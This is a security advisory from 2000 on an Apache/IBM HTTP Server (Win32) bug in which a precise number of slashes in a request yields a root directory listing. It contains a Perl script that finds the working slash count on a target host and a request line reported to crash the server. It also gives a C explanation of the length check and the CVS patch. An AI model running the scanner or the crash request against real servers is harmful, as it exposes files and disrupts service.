4th Jun 2000 [SBWID-2678]
COMMAND
	    httpd
SYSTEMS AFFECTED
	    IBM HTTP SERVER / APACHE
PROBLEM
	    Marek Roy found following.  There is a specific number of "/"
	    (forward slash) you can use to retrieve the contents of the root
	    directory of this particular Web Server.  Using this vulnerability,
	    you can retrieve any files or scripts running from that directory
	    and its sub-directories.
	    The number of "/" needed to reproduce this can differ from one
	    server to another.  You can get a trial copy at:
	
	        http://www-4.ibm.com/software/webservers/httpservers/download.html#v136
	
	    Vulnerable:
	
	        Server: IBM_HTTP_Server/1.3.6.2 Apache/1.3.7-dev (Win32)
	
	    If you send a GET request of 210 "/", you get the actual Web Page.
	    If you send a GET request of 211 "/", you get Index of /.  If  you
	    send a GET request of 212 "/", you get:
	
	        Forbidden
	        You don't have permission to access
	        "/" x 212 on this server.
	
	    Luke Harless verified the bug  using the perl program with  Apache
	    1.3.12 (Win32)  binary on  Win98 downloaded  from apache.org.   It
	    always takes 235 / to work for him.
	    Sample scan script to find / offset:
	
	    #!/usr/bin/perl
	    # Fetches http://HOST/ once, then re-requests it with an increasing
	    # number of "/" and stops at the first count whose response differs.
	    use LWP::Simple;
	    use strict;
	    my $host = shift() || die "usage:  $0 [hostname]\n";
	    my $data;
	    my $odata;
	    my $i;
	    $odata = get("http://$host/");
	    if (!defined $odata || $odata eq "")
	    {
	        die "no response from server:  $host\n";
	    }
	    for ($i = 2; $i < 4096; $i++)
	    {
	        print "Trying $i...\n";
	        $data = get("http://$host" . ("/" x $i));
	        $data = "" unless defined $data;   # an HTTP error counts as an empty page
	        if ($data ne $odata)
	        {
	            print "/ = $i\n\n$data\n\n";
	            exit;
	        }
	    }
	
	    H D Moore added following.  After he tried:
	
	        GET /DIR/%2e%2f%2e%2e%2e HTTP/1.0
	
	    the server simply crashed, burned, and stopped accepting
	    connections.  Whether the DoS was triggered by the earlier request
	    containing the null character or by the single %2e%2f sequence is
	    unknown.
	    Marc Slemko added following.   There is a bug  in Apache 1.3.x  on
	    the Win32 platform.  This does NOT impact Apache running on  Unix.
	    This is  NOT particular  to IBM's  product, but  is a  bug in  the
	    Apache HTTP  server included  in IBM's  bundle.   This bug  allows
	    people  to  get  a  directory  listing  of  a  directory, if it is
	    enabled  in  the  config,  even  if  an index file is present that
	    would normally be  displayed instead.   While normally this  is of
	    little consequence, in some situations this can be problematic.
	    What is happening is that when Apache calls stat() to check if the
	    index.html (or whatever name  it has) exists, Windows  will return
	    an error if the path is too long.  Apache incorrectly treated this
	    as  if  the  file  does  not  exist.   The included patch has been
	    applied  to  the  Apache  CVS  tree  and  corrects  this  issue by
	    correcting an existing pathname  length check.  Different  numbers
	    of  '/'s  are  required  based  on  the  length of the path to the
	    DocumentRoot.
	    This is just speculation, but my guess as to why there is an exact
	    number of  '/'s necessary  is that  if the  stat() of  ".htaccess"
	    fails in  an unexpected  way, then  the request  will be  refused.
	    "index.html" is only one character longer, hence the one character
	    window between the stat()  of "index.html" failing and  the stat()
	    of ".htaccess" failing.
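	    The length arithmetic behind the explanation above, as an added
	    example that is not part of the advisory or of Apache's own code.
	    It reproduces the revision 1.33 and 1.34 forms of the MAX_PATH check,
	    computes at which "/" count a constructed <DocumentRoot><slashes><name>
	    path first trips the fixed check for "index.html" versus ".htaccess"
	    (the one-character window Marc Slemko describes), and shows a
	    hypothetical hardened stat() wrapper that reports ENAMETOOLONG and
	    similar failures as errors rather than as "file absent".  The 40-byte
	    DocumentRoot length, the 260-byte MAX_PATH fallback and the sample
	    paths are constructed; the simplified path layout is an assumption.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

#ifndef MAX_PATH
#define MAX_PATH 260   /* Windows value (assumed here); it counts the terminating NUL */
#endif

/* The check as it stood in util_win32.c revision 1.33: a path of exactly
 * MAX_PATH characters passes even though it cannot be NUL-terminated
 * inside a MAX_PATH-byte buffer. */
int path_too_long_r133(const char *file)
{
    return strlen(file) > MAX_PATH;
}

/* The check after revision 1.34 (the patch quoted in the advisory). */
int path_too_long_r134(const char *file)
{
    return strlen(file) >= MAX_PATH;
}

/* Helpers that build a constructed path of exactly MAX_PATH characters and
 * ask each check whether it rejects it (1 = rejected). */
static int rejects_exact_max_path(int (*check)(const char *))
{
    char exact[MAX_PATH + 1];
    memset(exact, 'a', MAX_PATH);
    exact[MAX_PATH] = '\0';
    return check(exact);
}
int r133_rejects_exact(void) { return rejects_exact_max_path(path_too_long_r133); }
int r134_rejects_exact(void) { return rejects_exact_max_path(path_too_long_r134); }

/* Smallest number of "/" that makes docroot + slashes + name reach the length
 * the r1.34 check rejects.  Assumes the request path is laid out as
 * <docroot><n slashes><name>, a simplification of what Apache builds. */
int first_rejected_slash_count(size_t docroot_len, const char *name)
{
    return (int)(MAX_PATH - docroot_len - strlen(name));
}

/* Number of "/" counts for which "index.html" is already rejected while
 * ".htaccess" still passes: the window in which a listing is served. */
int listing_window(size_t docroot_len)
{
    return first_rejected_slash_count(docroot_len, ".htaccess")
         - first_rejected_slash_count(docroot_len, "index.html");
}

typedef enum { FILE_PRESENT, FILE_ABSENT, FILE_ERROR } file_state;

/* Hypothetical hardened existence probe (not Apache code): only ENOENT and
 * ENOTDIR mean "not there".  Any other failure, ENAMETOOLONG included, is
 * surfaced as an error so a caller refuses the request instead of falling
 * back to a directory listing. */
file_state probe_file(const char *path)
{
    struct stat st;
    if (stat(path, &st) == 0)
        return FILE_PRESENT;
    if (errno == ENOENT || errno == ENOTDIR)
        return FILE_ABSENT;
    return FILE_ERROR;
}

int main(void)
{
    printf("exactly MAX_PATH bytes: r1.33 rejects %d, r1.34 rejects %d\n",
           r133_rejects_exact(), r134_rejects_exact());

    /* constructed DocumentRoot of 40 characters */
    printf("index.html rejected from %d slashes, .htaccess from %d, window %d\n",
           first_rejected_slash_count(40, "index.html"),
           first_rejected_slash_count(40, ".htaccess"),
           listing_window(40));

    char overlong[301];                 /* constructed: one 300-byte component */
    memset(overlong, 'b', 300);
    overlong[300] = '\0';
    printf("probe(\"/\") = %d, probe(missing) = %d, probe(overlong) = %d\n",
           probe_file("/"),
           probe_file("/constructed_missing_dir_xyz/index.html"),
           probe_file(overlong));
    return 0;
}
```

	    With a 40-byte DocumentRoot the fixed check rejects "index.html" from
	    210 slashes and ".htaccess" from 211, so exactly one count yields a
	    listing, which is the shape of the 210/211/212 behaviour reported
	    above.  The probe wrapper is the defensive counterpart: a stat()
	    failure that is not ENOENT is never allowed to mean "absent".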
SOLUTION
	    Not Vulnerable:
	
	        Server: IBM_HTTP_Server/1.3.6.2 Apache/1.3.7-dev (Unix)
	
	    Obviously, a temporary workaround is to disable the Indexes option
	    (see the docs for the "Options" directive for details).
	    There  is  a  rough  plan  to  release  a 1.3.13 version of Apache
	    sometime soon, with various  changes including this security  fix,
	    however  this  is  subject  to  change.   The patch applied to the
	    Apache CVS tree, as shown at
	
	        http://www.apache.org/websrc/cvsweb.cgi/apache-1.3/src/os/win32/util_win32.c.diff?r1=1.33&r2=1.34
	
	    follows:
	
	    RCS file: /home/cvs/apache-1.3/src/os/win32/util_win32.c,v
	    retrieving revision 1.33
	    retrieving revision 1.34
	    diff -u -r1.33 -r1.34
	    --- apache-1.3/src/os/win32/util_win32.c	1999/02/18 11:07:14	1.33
	    +++ apache-1.3/src/os/win32/util_win32.c	2000/06/02 16:30:27	1.34
	    @@ -580,7 +580,7 @@
	         };
	         /* Test 1 */
	    -    if (strlen(file) > MAX_PATH) {
	    +    if (strlen(file) >= MAX_PATH) {
	 	    /* Path too long for Windows. Note that this test is not valid
	 	     * if the path starts with //?/ or \\?\. */
	 	    return 0;
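	    Review bot: the switch from `>` to `>=` is the right fix; MAX_PATH
	    on Windows counts the terminating NUL, so a name of exactly MAX_PATH
	    bytes already cannot be stored in a MAX_PATH buffer, and r1.33 let
	    that one length through, which is the single-byte gap behind the
	    one-character window between "index.html" and ".htaccess" noted
	    above.  Two points for the record: the comment in the hunk itself
	    says the test is not valid for paths starting with //?/ or \\?\, so
	    any caller that accepts such prefixes needs its own check; and the
	    hunk only tightens the length test, it does not change how a failing
	    stat() is classified, so the earlier description of a stat() error
	    being treated as "file does not exist" still applies to any other
	    failure cause.  Also, the header claims seven lines on each side but
	    only six are reproduced here, so the patch as quoted will not apply
	    cleanly; take the text from the cvsweb URL above.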